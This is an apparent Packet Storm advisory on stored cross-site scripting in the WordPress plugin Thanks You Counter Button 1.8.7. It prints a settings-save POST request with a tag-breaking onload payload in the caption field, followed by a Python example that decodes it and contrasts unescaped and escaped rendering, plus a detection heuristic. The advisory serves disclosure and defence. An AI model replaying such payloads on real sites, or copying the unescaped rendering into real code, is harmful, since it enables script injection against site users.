WordPress Thanks You Counter Button 1.8.7 Cross Site Scripting

2014-02-25T00:00:00
ID PACKETSTORM:125397
Type packetstorm
Reporter HauntIT
Modified 2014-02-25T00:00:00

Description

                                        
                                            `# ==============================================================  
# Title ...| Thanks You Counter Button XSS  
# Version .| thanks-you-counter-button 1.8.7  
# Date ....| 23.02.2014  
# Found ...| HauntIT Blog  
# Home ....| http://www.wordpress.org/plugins/  
# ==============================================================  
  
  
# ==============================================================  
# XSS  
  
---<request>---  
POST /k/wordpress/wp-admin/options.php HTTP/1.1  
Host: 10.149.14.62  
(...)  
Content-Length: 806  
  
option_page=thankyoubutton-options&action=update&_wpnonce=ed03a9f018&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dthankyou.php&thanks_display_page=1&thanks_display_home=1&thanks_position_firstpageonly=1&thanks_position_lastpageonly=1&thanks_caption='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&thanks_style=float%3A+left%3B+margin-right%3A+10px%3B&thanks_caption_style=font-family%3A+Verdana%2C+Arial%2C+Sans-Serif%3B+font-size%3A+14px%3B+font-weight%3A+normal%3B&thanks_caption_color=%23ffffff&thanks_size=large&thanks_form=rounded&thanks_color=blue&thanks_custom_url=&thanks_custom_glow_url=&thanks_custom_width=100&thanks_custom_height=26&thanks_check_ip_address=1&thanks_time_limit%5B%5D=1&thanks_time_limit_seconds=60&thanks_display_settings_shortcuts=1&submit=Save+Changes  
---<request>---  
  
[+] Also vulnerable are: thanks_caption_style, thanks_style  
  
[+] Note: the request above is an ordinary settings save through wp-admin/options.php,  
    so it needs a logged-in user with the manage_options capability and a valid _wpnonce.  
    The submitted value is persisted as a WordPress option, so the XSS is stored and  
    fires wherever the plugin echoes that option back without escaping.  
  
  
# ==============================================================  
# More @ http://HauntIT.blogspot.com  
# Thanks! ;)  
# o/   
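The following is an added example, not code from the advisory or from the plugin. It decodes the exact POST body shown above, recovers the payload that lands in the `thanks_caption` option, and contrasts an unescaped render with an escaped one. The two render templates are an assumption about how the plugin echoes its options (one attribute context, one text context); the plugin's real markup is not on the page. `find_injected_values` is a simple heuristic for spotting this payload class in captured settings saves.

```python
"""Decode the settings-save request from the advisory and show why the
injected caption becomes stored XSS once the option is echoed unescaped.

Added example: the render templates are an assumed stand-in for the
plugin's output and are not the plugin's real markup.
"""
import html
from urllib.parse import parse_qs

# POST body copied verbatim from the request in the advisory.
ADVISORY_BODY = (
    "option_page=thankyoubutton-options&action=update&_wpnonce=ed03a9f018"
    "&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dthankyou.php"
    "&thanks_display_page=1&thanks_display_home=1"
    "&thanks_position_firstpageonly=1&thanks_position_lastpageonly=1"
    "&thanks_caption='%3e\"%3e%3cbody%2fonload%3dalert(9999)%3e"
    "&thanks_style=float%3A+left%3B+margin-right%3A+10px%3B"
    "&thanks_caption_style=font-family%3A+Verdana%2C+Arial%2C+Sans-Serif%3B"
    "+font-size%3A+14px%3B+font-weight%3A+normal%3B"
    "&thanks_caption_color=%23ffffff&thanks_size=large&thanks_form=rounded"
    "&thanks_color=blue&thanks_custom_url=&thanks_custom_glow_url="
    "&thanks_custom_width=100&thanks_custom_height=26&thanks_check_ip_address=1"
    "&thanks_time_limit%5B%5D=1&thanks_time_limit_seconds=60"
    "&thanks_display_settings_shortcuts=1&submit=Save+Changes"
)

# The three option names the advisory reports as injectable.
VULNERABLE_OPTIONS = ("thanks_caption", "thanks_caption_style", "thanks_style")


def decode_settings(body):
    """Return the submitted option values as a flat dict (first value wins).

    keep_blank_values=True so empty fields such as thanks_custom_url survive,
    matching what options.php would store for them.
    """
    parsed = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def render_button_unsafe(settings):
    """Assumed plugin-style output: option values dropped straight into two
    style attributes and the caption text. This is the pattern the advisory
    exploits; the caption closes the open quote/tag and injects <body/onload>."""
    return (
        '<div style="{style}"><span style="{caption_style}">{caption}</span></div>'
        .format(
            style=settings["thanks_style"],
            caption_style=settings["thanks_caption_style"],
            caption=settings["thanks_caption"],
        )
    )


def render_button_safe(settings):
    """Same markup with every value escaped for its output context.

    html.escape(quote=True) encodes < > & " and ', so a value can neither
    close the attribute it sits in nor open a new tag. In a WordPress plugin
    the equivalent calls are esc_attr() for attributes and esc_html() for text.
    """
    def esc(value):
        return html.escape(value, quote=True)

    return (
        '<div style="{style}"><span style="{caption_style}">{caption}</span></div>'
        .format(
            style=esc(settings["thanks_style"]),
            caption_style=esc(settings["thanks_caption_style"]),
            caption=esc(settings["thanks_caption"]),
        )
    )


def find_injected_values(settings, names=VULNERABLE_OPTIONS):
    """Flag submitted option values that carry HTML metacharacters.

    A button caption or an inline CSS declaration has no legitimate need for
    < > " or ', so their presence in these fields is a cheap, low-noise
    indicator of the payload class shown in the advisory. Heuristic only.
    """
    suspicious = set('<>"\'')
    return [n for n in names if n in settings and suspicious & set(settings[n])]


if __name__ == "__main__":
    s = decode_settings(ADVISORY_BODY)
    print("caption as stored :", s["thanks_caption"])
    print("flagged options   :", find_injected_values(s))
    print("unsafe render     :", render_button_unsafe(s))
    print("escaped render    :", render_button_safe(s))
```

Run stand-alone it prints the decoded caption, which options the heuristic flags, and both renders; the escaped render keeps the `<body/onload=...>` string inert as text. The same two controls apply in the plugin itself: a sanitize callback on the registered option so the payload is never stored, and context-appropriate escaping at every echo so a stored value cannot execute even if it slips through.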